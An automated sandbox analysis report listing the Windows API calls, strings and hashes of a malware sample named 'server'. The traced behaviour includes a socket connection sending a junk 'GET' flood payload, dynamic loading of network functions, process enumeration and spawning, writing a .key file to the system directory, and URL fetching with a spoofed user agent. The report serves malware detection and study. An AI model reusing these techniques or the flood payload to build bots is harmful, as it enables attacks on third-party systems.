                                                                                              • CreateWindowExA.USER32(00000000,1007A204,1007A204,00CF0000,000000DF,000000DF,000000DF,000000DF,00000000,00000000,00000000,00000000), ref: 100028B4
                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 100028C3
                                                                                              • UpdateWindow.USER32(00000000), ref: 100028CA
                                                                                              • GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 100028E1
                                                                                              • TranslateMessage.USER32(00007F05), ref: 100028F9
                                                                                              • DispatchMessageA.USER32(00007F05), ref: 10002900
                                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1000290D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Message$Window$Load$ClassCreateCursorDispatchHandleIconModuleRegisterShowTranslateUpdate
                                                                                              • String ID: 0
                                                                                              • API String ID: 2442869364-4108050209
                                                                                              • Opcode ID: ffe4e2d3166741ce70057db877a5010deb8e940f0538d27bc5693e2a0d76c847
                                                                                              • Instruction ID: 49f6c6a48927359fcf1092dd417bf73ba722ddb4962998ae2525dee049488c6b
                                                                                              • Opcode Fuzzy Hash: ffe4e2d3166741ce70057db877a5010deb8e940f0538d27bc5693e2a0d76c847
                                                                                              • Instruction Fuzzy Hash: C121B5715483607FF310DB688C49F4B7BA4EB85B60F104A19F744AB3C4EBB59A00CB96
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: wsprintf$Version
                                                                                              • String ID: Windows 2000$Windows 2003$Windows NT$Windows Windows7/Vista/2008$Windows XP
                                                                                              • API String ID: 514958720-574678973
                                                                                              • Opcode ID: c538841ac387e5c01469a887863cc8ff63225bb54d14823df1dd693bf34828af
                                                                                              • Instruction ID: 24eada89e271c6f03dafd311d52a79426f13bcc6e3bcc886577ca1c3c34736ac
                                                                                              • Opcode Fuzzy Hash: c538841ac387e5c01469a887863cc8ff63225bb54d14823df1dd693bf34828af
                                                                                              • Instruction Fuzzy Hash: D5118230900796ABF610CB58DCA4B8A77D0EB43295FD1C519F6C992310D738A994CB5B
                                                                                              APIs
                                                                                              • ReleaseDC.USER32(?,?), ref: 1000FEB8
                                                                                              • DeleteDC.GDI32(?), ref: 1000FEC8
                                                                                              • DeleteDC.GDI32(?), ref: 1000FECE
                                                                                              • DeleteDC.GDI32(?), ref: 1000FED4
                                                                                              • DeleteDC.GDI32(?), ref: 1000FEDD
                                                                                              • DeleteObject.GDI32(?), ref: 1000FEE9
                                                                                              • DeleteObject.GDI32(?), ref: 1000FEEF
                                                                                              • DeleteObject.GDI32(?), ref: 1000FEF8
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,1006A14E,000000FF,1000FE68), ref: 1000FF02
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,1006A14E,000000FF,1000FE68), ref: 1000FF0E
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,1006A14E,000000FF,1000FE68), ref: 1000FF17
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,1006A14E,000000FF,1000FE68), ref: 1000FF20
                                                                                              • DestroyCursor.USER32(00000000), ref: 1000FF46
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Delete$??3@$Object$CursorDestroyRelease
                                                                                              • String ID:
                                                                                              • API String ID: 2735177900-0
                                                                                              • Opcode ID: 6d97574774b83c00f42543f7479bee7085eb61e582d7fdda2d66cd1cb8b7d107
                                                                                              • Instruction ID: e788815f10d6092d27ca2afd98025b986ca8f6d31416693049e9cb6994815525
                                                                                              • Opcode Fuzzy Hash: 6d97574774b83c00f42543f7479bee7085eb61e582d7fdda2d66cd1cb8b7d107
                                                                                              • Instruction Fuzzy Hash: C121FAB6500B509BE324DB69CC80A67F3EDFF89610F154E1DF69683750DAB9F8448B60
                                                                                              APIs
                                                                                                • Part of subcall function 10006830: GetSystemDirectoryA.KERNEL32(?,00000100), ref: 10006843
                                                                                                • Part of subcall function 10006830: sprintf.MSVCRT ref: 1000688E
                                                                                              • RtlExitUserThread.NTDLL(00000000), ref: 10006A49
                                                                                                • Part of subcall function 100040D0: GetTickCount.KERNEL32 ref: 100040D1
                                                                                                • Part of subcall function 100040D0: rand.MSVCRT ref: 100040D9
                                                                                              • sprintf.MSVCRT ref: 100069AF
                                                                                                • Part of subcall function 100067F0: GetInputState.USER32 ref: 100067F3
                                                                                                • Part of subcall function 100067F0: GetCurrentThreadId.KERNEL32 ref: 100067FF
                                                                                                • Part of subcall function 100067F0: PostThreadMessageA.USER32(00000000), ref: 10006806
                                                                                                • Part of subcall function 100067F0: GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 10006817
                                                                                              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 100069D9
                                                                                              • Sleep.KERNEL32(00000064), ref: 100069DD
                                                                                              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 100069FF
                                                                                              • Sleep.KERNEL32(00000064), ref: 10006A03
                                                                                              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 10006A25
                                                                                              • Sleep.KERNEL32(000003E8), ref: 10006A2C
                                                                                              • TerminateProcess.KERNEL32(?,00000000), ref: 10006A35
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Process$CreateSleepThread$Messagesprintf$CountCurrentDirectoryExitInputPostStateSystemTerminateTickUserrand
                                                                                              • String ID: "%s" "%s?abc=%d%d%d%d"$D
                                                                                              • API String ID: 172844161-298079244
                                                                                              • Opcode ID: 996b448a330ea39742fb996c5da3b8e9d5bac2eccd2bcf86842a313de783662b
                                                                                              • Instruction ID: dee45d619fc2e394e3d2b66f1065b8d82e3a70ab678904dd2a9156dbc98c66a4
                                                                                              • Opcode Fuzzy Hash: 996b448a330ea39742fb996c5da3b8e9d5bac2eccd2bcf86842a313de783662b
                                                                                              • Instruction Fuzzy Hash: C44185B26043856EF710D754CC41FB777A9FBC4704F100929F7899A281DAB5A9098B63
                                                                                              APIs
                                                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100097B4
                                                                                                • Part of subcall function 10009720: ??2@YAPAXI@Z.MSVCRT(00000400,?,76F90F10,76F92EE0,10002AEA,?,SSSSSS), ref: 10009728
                                                                                                • Part of subcall function 10009720: FindResourceA.KERNEL32(?,0000006C,HOST), ref: 10009749
                                                                                                • Part of subcall function 10009720: LoadResource.KERNEL32(?,00000000), ref: 10009751
                                                                                                • Part of subcall function 10009720: LockResource.KERNEL32(00000000), ref: 10009758
                                                                                                • Part of subcall function 10009720: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009784
                                                                                              • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 1000986B
                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 1000987E
                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 10009892
                                                                                              • lstrlen.KERNEL32(?), ref: 100098A0
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 100098A9
                                                                                              • lstrlen.KERNEL32(?,?,00000000), ref: 100098CF
                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000000), ref: 100098D8
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 100098DF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: File$Resource$??2@lstrlen$??3@CloseCreateDirectoryFindHandleLoadLockPointerSizeSystemWrite
                                                                                              • String ID: .key$XXXXXX
                                                                                              • API String ID: 3558955628-2601115946
                                                                                              • Opcode ID: d24516f02ea8cd83adf64a079234290d1210b910ff9b8bcf6310260086aca102
                                                                                              • Instruction ID: d999d40ade01bfd780963a7e4da00662e15d7ecd24b9ce1fec2d34a8ea1a0eed
                                                                                              • Opcode Fuzzy Hash: d24516f02ea8cd83adf64a079234290d1210b910ff9b8bcf6310260086aca102
                                                                                              • Instruction Fuzzy Hash: E0313B722406441BE728DA749C9AB6B368BEBC5371F14072DFA67872D1DEE49D098350
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(ws2_32.dll), ref: 1000D50E
                                                                                              • GetProcAddress.KERNEL32(00000000,closesocket), ref: 1000D51E
                                                                                              • LoadLibraryA.KERNEL32(ws2_32.dll), ref: 1000D57A
                                                                                              • GetProcAddress.KERNEL32(00000000,send), ref: 1000D586
                                                                                              • GetLastError.KERNEL32(?,?,00000000), ref: 1000D5BA
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 1000D5FB
                                                                                              • Sleep.KERNEL32(00000002), ref: 1000D611
                                                                                              • FreeLibrary.KERNEL32(?), ref: 1000D628
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Library$AddressLoadProc$CloseErrorFreeHandleLastSleep
                                                                                              • String ID: closesocket$send$ws2_32.dll
                                                                                              • API String ID: 2554972651-2162363962
                                                                                              • Opcode ID: 7ecabd3abaaee7e7d6219c6ba1515479c9e7988b56b45e660df247fc14e0e3a4
                                                                                              • Instruction ID: 67dba68df69635aebfa3a3596635123a731ded8294c22980d7a7e8a666a99e77
                                                                                              • Opcode Fuzzy Hash: 7ecabd3abaaee7e7d6219c6ba1515479c9e7988b56b45e660df247fc14e0e3a4
                                                                                              • Instruction Fuzzy Hash: 6031E330104751ABF604EF68CC84B6F77E9FF89795F010A1AFA49D7185CB71E8008B61
                                                                                              APIs
                                                                                              • WSAStartup.WS2_32(00000202,?), ref: 10004144
                                                                                              • htons.WS2_32 ref: 1000416B
                                                                                              • inet_addr.WS2_32(1007DD2C), ref: 1000417B
                                                                                              • socket.WS2_32(00000002,00000001,00000000), ref: 1000419A
                                                                                              • connect.WS2_32(00000000,?,00000010), ref: 100041AA
                                                                                              • send.WS2_32(00000000,GET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET !@#$%.htmGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#,?,00000000), ref: 100041CF
                                                                                              • Sleep.KERNEL32(00000032,?,00000000), ref: 100041D8
                                                                                              • closesocket.WS2_32(00000000), ref: 100041E5
                                                                                              • RtlExitUserThread.NTDLL(00000000), ref: 100041F6
                                                                                              • closesocket.WS2_32 ref: 100041FD
                                                                                              Strings
                                                                                              • GET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET !@#$%.htmGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#, xrefs: 100041B7, 100041C9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: closesocket$ExitSleepStartupThreadUserconnecthtonsinet_addrsendsocket
                                                                                              • String ID: GET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET !@#$%.htmGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#
                                                                                              • API String ID: 4272391932-4039768343
                                                                                              • Opcode ID: 68e5b576acd18c2c4b14ef7e3e27ec556b121b0e629d7d28d9c654a0c05f4b01
                                                                                              • Instruction ID: 045f70dc197dd2c2e97778d2da9c7e2bc6c5d128113408fc6fa20a61d9539879
                                                                                              • Opcode Fuzzy Hash: 68e5b576acd18c2c4b14ef7e3e27ec556b121b0e629d7d28d9c654a0c05f4b01
                                                                                              • Instruction Fuzzy Hash: 802129711053A05BF300DF34CC89BAA3BA9FF45750F10062DF5A6D61E1EBB49D49876A
                                                                                              APIs
                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000C549
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000128,00000002,00000000), ref: 1000C559
                                                                                              • Process32First.KERNEL32(00000000,00000000), ref: 1000C56B
                                                                                              • GetLastError.KERNEL32(00000000,00000000), ref: 1000C574
                                                                                              • _strupr.MSVCRT ref: 1000C58D
                                                                                              • _strupr.MSVCRT ref: 1000C594
                                                                                              • strstr.MSVCRT ref: 1000C59A
                                                                                              • Process32Next.KERNEL32(?,00000000), ref: 1000C5B8
                                                                                              • _strupr.MSVCRT ref: 1000C5C2
                                                                                              • _strupr.MSVCRT ref: 1000C5C9
                                                                                              • strstr.MSVCRT ref: 1000C5CF
                                                                                              • Process32Next.KERNEL32(?,00000000), ref: 1000C5E2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _strupr$Process32$Nextstrstr$??2@CreateErrorFirstLastSnapshotToolhelp32
                                                                                              • String ID:
                                                                                              • API String ID: 3005159451-0
                                                                                              • Opcode ID: 63d5324c3769c6fad5b2491b424af0fabcd44a692e81632836f318dc6d157164
                                                                                              • Instruction ID: c0712735c5d1058a8d10a1fcff2c42ee7888384913c1c0693e55bcc166550335
                                                                                              • Opcode Fuzzy Hash: 63d5324c3769c6fad5b2491b424af0fabcd44a692e81632836f318dc6d157164
                                                                                              • Instruction Fuzzy Hash: 5D1106B69003552BF600D735AC85E9B7B9CDF803E6F04143AFD06D6201FA21FE5486B6
                                                                                              APIs
                                                                                              • LCMapStringW.KERNEL32(00000000,00000100,0040642C,00000001,00000000,00000000,00000103,00000001,00000000,?,0040446F,00200020,00000000,?,00000000,00000000), ref: 00404FC1
                                                                                              • LCMapStringA.KERNEL32(00000000,00000100,00406428,00000001,00000000,00000000,?,0040446F,00200020,00000000,?,00000000,00000000,00000001), ref: 00404FDD
                                                                                              • LCMapStringA.KERNEL32(?,?,?,?,oD@ ,?,00000103,00000001,00000000,?,0040446F,00200020,00000000,?,00000000,00000000), ref: 00405026
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,0040446F,00200020,00000000,?,00000000,00000000), ref: 0040505E
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,0040446F,00200020,00000000,?,00000000), ref: 004050B6
                                                                                              • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,0040446F,00200020,00000000,?,00000000), ref: 004050CC
                                                                                              • LCMapStringW.KERNEL32(?,?,?,00000000,oD@ ,?,?,0040446F,00200020,00000000,?,00000000), ref: 004050FF
                                                                                              • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,0040446F,00200020,00000000,?,00000000), ref: 00405167
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2612467776.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2605808787.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2617496630.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2623270724.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2628429149.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2634431094.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                                                                              Similarity
                                                                                              • API ID: String$ByteCharMultiWide
                                                                                              • String ID: oD@
                                                                                              • API String ID: 352835431-4270158488
                                                                                              • Opcode ID: 2afe8f83c1e32ad7c20cd3ef5f0d9ce625311a17c994b0e660629879fca01b21
                                                                                              • Instruction ID: cd81302389fada6b5ad7ddbf8cce1e057f1d7051e18c97d2a0019bd6d71d522c
                                                                                              • Opcode Fuzzy Hash: 2afe8f83c1e32ad7c20cd3ef5f0d9ce625311a17c994b0e660629879fca01b21
                                                                                              • Instruction Fuzzy Hash: 04517B31900619EBCF228F94DD45AAF7FB9EB48750F10413AF915B52A0D37A8D21DFA8
                                                                                              APIs
                                                                                              • InternetOpenA.WININET(Mozilla/4.0 (compatible),00000000,00000000,00000000,00000000), ref: 10012B86
                                                                                              • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 10012BB4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: InternetOpen
                                                                                              • String ID: MZ$Mozilla/4.0 (compatible)
                                                                                              • API String ID: 2038078732-1122958964
                                                                                              • Opcode ID: 1b603d2b6cb4bb4a2b0791728ef789fd7c844eea8b35218b3130136ed5bb0548
                                                                                              • Instruction ID: 8c63eb6a41a225431111a82eac4f27fd10ac0d63006a227f2e92e921feb65f24
                                                                                              • Opcode Fuzzy Hash: 1b603d2b6cb4bb4a2b0791728ef789fd7c844eea8b35218b3130136ed5bb0548
                                                                                              • Instruction Fuzzy Hash: 3C31F5B1204359ABD210DF25DC80E9FBBEDFBC97A4F01092DF64097140D775E94987A6
                                                                                              APIs
                                                                                              • GetVersionExA.KERNEL32(?), ref: 0040164A
                                                                                              • GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 00401698
                                                                                              • wsprintfA.USER32 ref: 004016CA
                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 004016E6
                                                                                              • ExitProcess.KERNEL32 ref: 004016F3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2612467776.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2605808787.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2617496630.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2623270724.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2628429149.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2634431094.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesDirectoryExitFileProcessVersionWindowswsprintf
                                                                                              • String ID: %s\SysTEM32\sysedit.exe$H$o$s$t
                                                                                              • API String ID: 2470598139-87740868
                                                                                              • Opcode ID: 251448df7b50cf4df5bb98e08941e18823b330a20de11f881ffddb0b690df73d
                                                                                              • Instruction ID: 47bd58147c64a949f084ac4d6b8b2736ebceef07ebb8f42e32fac6c8f9cf200e
                                                                                              • Opcode Fuzzy Hash: 251448df7b50cf4df5bb98e08941e18823b330a20de11f881ffddb0b690df73d
                                                                                              • Instruction Fuzzy Hash: 02210830E00248BFDB10C768DC087CEBBB96F46304F0044E9E28AB22D1DBB45B88CA57
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CharNext$free$AttributesCreateDirectoryErrorFileLastlstrcpylstrlenmalloc
                                                                                              • String ID:
                                                                                              • API String ID: 3289936468-0
                                                                                              • Opcode ID: 91c087a2b93d1311ec0e6759ce73b84a9ff3fbed6c289464c935a959dac4fcdd
                                                                                              • Instruction ID: 2210af07b0f8d49035197b9e4786ebf24fa4771591eb8ab4f4da9f9fb379daaa
                                                                                              • Opcode Fuzzy Hash: 91c087a2b93d1311ec0e6759ce73b84a9ff3fbed6c289464c935a959dac4fcdd
